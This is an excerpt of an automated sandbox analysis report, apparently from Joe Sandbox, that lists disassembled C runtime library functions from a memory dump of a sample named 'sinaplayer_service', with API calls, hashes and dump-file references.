                                                                                                                                                                                                    • API ID: CriticalSectionThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateEnterErrorEventExceptionLastLeaveObjectPrioritySingleThrowWaitfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1704029421-0
                                                                                                                                                                                                    • Opcode ID: a9ab6520b5af9106e093b56063e538ecda287fc1c02fcc54b969497c9dee0934
                                                                                                                                                                                                    • Instruction ID: bdca2f8aa8b12131742cb458c571bc3386880082097fdcb1d16d1f844bf93e6f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ab6520b5af9106e093b56063e538ecda287fc1c02fcc54b969497c9dee0934
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D521F571109152AFFB14ABB6DC48BBE77B8FF02365F240219FA05D6185DBA4A4018BA5
                                                                                                                                                                                                    Function 6D0AE415 Relevance: 13.6, APIs: 9, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6D0AE490,00000010), ref: 6D0AE428
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,6D0AE490,00000010), ref: 6D0AE7B6
                                                                                                                                                                                                    • calloc.MSVCR120(00000001,00000002,00000000,6D0AE490,00000010), ref: 6D0AE7C1
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(00000000,00000001,?), ref: 6D0AE7DB
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AE490,00000010), ref: 6D0DF4D5
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AE490,00000010), ref: 6D0DF4DF
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DF4F0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0DF4FB
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9571
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9580
                                                                                                                                                                                                      • Part of subcall function 6D0A9555: _wcsnicoll.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A959D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnowcslen$CriticalEnterSection_invalid_parameter_noinfo_lock_wcsnicollcallocwcscpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 505790351-0
                                                                                                                                                                                                    • Opcode ID: 5e54a9cf1a5bccf3107921807c03ddf3d220d3806d5f6508eea81ad383f4b646
                                                                                                                                                                                                    • Instruction ID: 24e84cef7e65f821a4c1cc81062c6f41941a2245384818a4d3d9403a2ae644e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e54a9cf1a5bccf3107921807c03ddf3d220d3806d5f6508eea81ad383f4b646
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96219F70A083179BFB029FB48800B6E3BBCBF04758F168059EA14EB292EF75C5019B91
                                                                                                                                                                                                    Function 6D0A4749 Relevance: 13.6, APIs: 9, Instructions: 80COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000000,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0A4766
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000,?,?,?), ref: 6D0D2BED
                                                                                                                                                                                                    • free.MSVCR120(?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2BF5
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2BFD
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,00000000,?,00000000,6D15CEE8,6D0A7A32,00000000,6D15CEE8,?,?,?,6D0A78EE,6D15CEE8,00000000), ref: 6D0D2C14
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,?,?,?), ref: 6D0D2C33
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,?,?,?), ref: 6D0D2C4A
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000000,?,?,?), ref: 6D0D2C65
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,00000000,?,00000000,00000000,?,?,?), ref: 6D0D2C75
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: freememset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2499939622-0
                                                                                                                                                                                                    • Opcode ID: 2902b45434b6715a689a25d5e0cf82e1bf17e329d42e4f64c1065a4f278fef0f
                                                                                                                                                                                                    • Instruction ID: 98227d7aaafb8d47204d313fbfd4c0d907299a104f91dc514496dee4490a5d5f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2902b45434b6715a689a25d5e0cf82e1bf17e329d42e4f64c1065a4f278fef0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B6219071A04B41AFEB359B39DC42E2BB7E8EF40358301882EE16BCB560DB71F8419A51
                                                                                                                                                                                                    Function 6D0A6951 Relevance: 13.6, APIs: 9, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0A6958
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000028,0000002C,6D0A69D2,?,00000000,?,?,?,6D0A3D6E,6D0948CA,00000000,0000000C,6D0A3E4B,?,00000000,?), ref: 6D0A6961
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • memcpy.MSVCR120(00000000,6D160674,00000028,0000002C,6D0A69D2,?,00000000,?,?,?,6D0A3D6E,6D0948CA,00000000,0000000C,6D0A3E4B,?), ref: 6D0A697B
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000001), ref: 6D0A6990
                                                                                                                                                                                                    • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR120(00000002,00000001), ref: 6D0A699B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D336F
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E76B4,6D15D0A4), ref: 6D0D3384
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,6D0E76B4,6D15D0A4), ref: 6D0D33A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@std::exception::exception$??2@ExceptionH_prolog3_catchThrowmallocmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1089537546-0
                                                                                                                                                                                                    • Opcode ID: cdb4aea44549af34e7e9decb8afd07f597ace0fefe80a6df0a7f6ec7f46442d8
                                                                                                                                                                                                    • Instruction ID: dc96fb830bfe4f093c3c369f2b2843773d25922789113554af3fe25e9d6707c3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdb4aea44549af34e7e9decb8afd07f597ace0fefe80a6df0a7f6ec7f46442d8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F721CC71D042049BEF00DFE8C4857EDBBB4BF59318F51811AE615AF291DFB09546C791
                                                                                                                                                                                                    Function 6D0F2F46 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F52
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F5E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F6C
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F78
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2F8D
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FAA
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FBB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FC1
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6D0F2CBA,00000004,6D0F249A), ref: 6D0F2FD1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4002485106-0
                                                                                                                                                                                                    • Opcode ID: fd3ca3473dc77277a4ec606a5702b32dc125410c9ea905180324d604c32abaa4
                                                                                                                                                                                                    • Instruction ID: 024016acfea2e66f399418d056313c5222f6be3d897db94a79ef487520aff075
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd3ca3473dc77277a4ec606a5702b32dc125410c9ea905180324d604c32abaa4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF119832914563DFEB359B75C581B19F3E4BF0A3603620969ED40E7501CB21EC568AD0
                                                                                                                                                                                                    Function 6D0ABF39 Relevance: 13.6, APIs: 9, Instructions: 62threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC), ref: 6D0ABF53
                                                                                                                                                                                                    • _getptd.MSVCR120 ref: 6D0ABF64
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,?), ref: 6D0ABF6D
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • CreateThread.KERNEL32(?,?,6D0ABFB4,00000000,?,?), ref: 6D0ABF9B
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D3EAF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D3EBA
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D3ECF
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D3EDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _lock$CreateThread__dosmaperr_calloc_crt_errno_getptd_initptd_invalid_parameter_noinfofree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1715317214-0
                                                                                                                                                                                                    • Opcode ID: acca400ecba006f2e582ac86e5eba482ea40465d57e86d31553ac8e874ab7d5b
                                                                                                                                                                                                    • Instruction ID: 8c714c33bad1310bcb9991155870c67083a7e3ce70a6a983fe029ff2bc62dd3b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: acca400ecba006f2e582ac86e5eba482ea40465d57e86d31553ac8e874ab7d5b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D11C23210970BAFFB019FA5DC40B6B7BA8EF492B4705412AFA24871C1DB71D4018B60
                                                                                                                                                                                                    Function 6D09EE42 Relevance: 13.6, APIs: 9, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6D09EE72
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D09EE7C
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D09EE83
                                                                                                                                                                                                      • Part of subcall function 6D09E4A7: __doserrno.MSVCR120(00000000,?,6D0DEE56,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D09E4AB
                                                                                                                                                                                                      • Part of subcall function 6D09E4A7: _errno.MSVCR120(00000000,?,6D0DEE56,00000000,?,6D0DE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6D09E4BE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D09EE89
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D42A2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D42AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D42B4
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D42C0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D42CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2636503730-0
                                                                                                                                                                                                    • Opcode ID: 046ab535efe429e0d168d9be38232c603888a0e4785b8d1db2c0ce3981109fd9
                                                                                                                                                                                                    • Instruction ID: b0d3a1ed04ecdf680361daeadca1eb4d4f817248b7143dae9a0401d17ac07b65
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 046ab535efe429e0d168d9be38232c603888a0e4785b8d1db2c0ce3981109fd9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E11CE3460A3099BFB019BB4D8047AD7BF8BF0A324F416449EE10DF290DBB4CD40AB61
                                                                                                                                                                                                    Function 6D096419 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 483COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: +$g
                                                                                                                                                                                                    • API String ID: 0-3915867470
                                                                                                                                                                                                    • Opcode ID: 2ea1763d89e9f418f724a577c5d931f8ea1bbcd8d767b2cc3a5d0ae812590928
                                                                                                                                                                                                    • Instruction ID: eb9109c130ab8d02438a7459ad2c982759110c4077a2a571eea461113d46b72c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ea1763d89e9f418f724a577c5d931f8ea1bbcd8d767b2cc3a5d0ae812590928
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF02D5B1D5922A9AFB218B54CC887FDB7B4BB45314F9461D9D408AF150EB758AC0EFC0
                                                                                                                                                                                                    Function 6D128546 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F720: GetLastError.KERNEL32(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F722
                                                                                                                                                                                                      • Part of subcall function 6D08F720: __crtFlsGetValue.MSVCR120(?,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F730
                                                                                                                                                                                                      • Part of subcall function 6D08F720: SetLastError.KERNEL32(00000000,?,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?,?,?,6D11E497,0000000E), ref: 6D08F741
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000086,00000002), ref: 6D12856D
                                                                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 6D128590
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_nerr.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D12639F
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_nerr.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D1263A8
                                                                                                                                                                                                      • Part of subcall function 6D126394: __sys_errlist.MSVCR120(00000086,?,6D12627A,00000000), ref: 6D1263AF
                                                                                                                                                                                                    • _mbstowcs_s.LIBCMT(00000000,?,00000086,00000000,00000085), ref: 6D12859A
                                                                                                                                                                                                      • Part of subcall function 6D092F50: _mbstowcs_s_l.MSVCR120(?,?,?,?,?,00000000), ref: 6D092F64
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D1285AF
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D128642
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,6D12637F,00000000,00000000,00000000,00000000,?,00000086,?,00000000,00000000), ref: 6D12864C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast__sys_nerr$Value__crt__get_sys_err_msg__sys_errlist_calloc_crt_errno_invalid_parameter_noinfo_invoke_watson_mbstowcs_s_mbstowcs_s_l
                                                                                                                                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                                                                                                    • API String ID: 2345991744-798102604
                                                                                                                                                                                                    • Opcode ID: 7b8174727d5dd0e875fbc6508ed8562b98a9d459612b5456ddf016d969685aa9
                                                                                                                                                                                                    • Instruction ID: b3fc15731eda377bc70dd99fecae10c3bb472c88c34bb04c92856b3804f782d8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b8174727d5dd0e875fbc6508ed8562b98a9d459612b5456ddf016d969685aa9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6831BC6294D3D11FC71387704C69556BF286F23214B0EC3CFE9898F59BE79A988187A2
                                                                                                                                                                                                    Function 6D11DEDC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DEF3
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DF06
                                                                                                                                                                                                    • _getptd.MSVCR120(?,?,?,00000000,00000000), ref: 6D11DF0E
                                                                                                                                                                                                    • _CallSETranslator.LIBCMT ref: 6D11DF3C
                                                                                                                                                                                                    • ?_inconsistency@@YAXXZ.MSVCR120(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6D11DF52
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
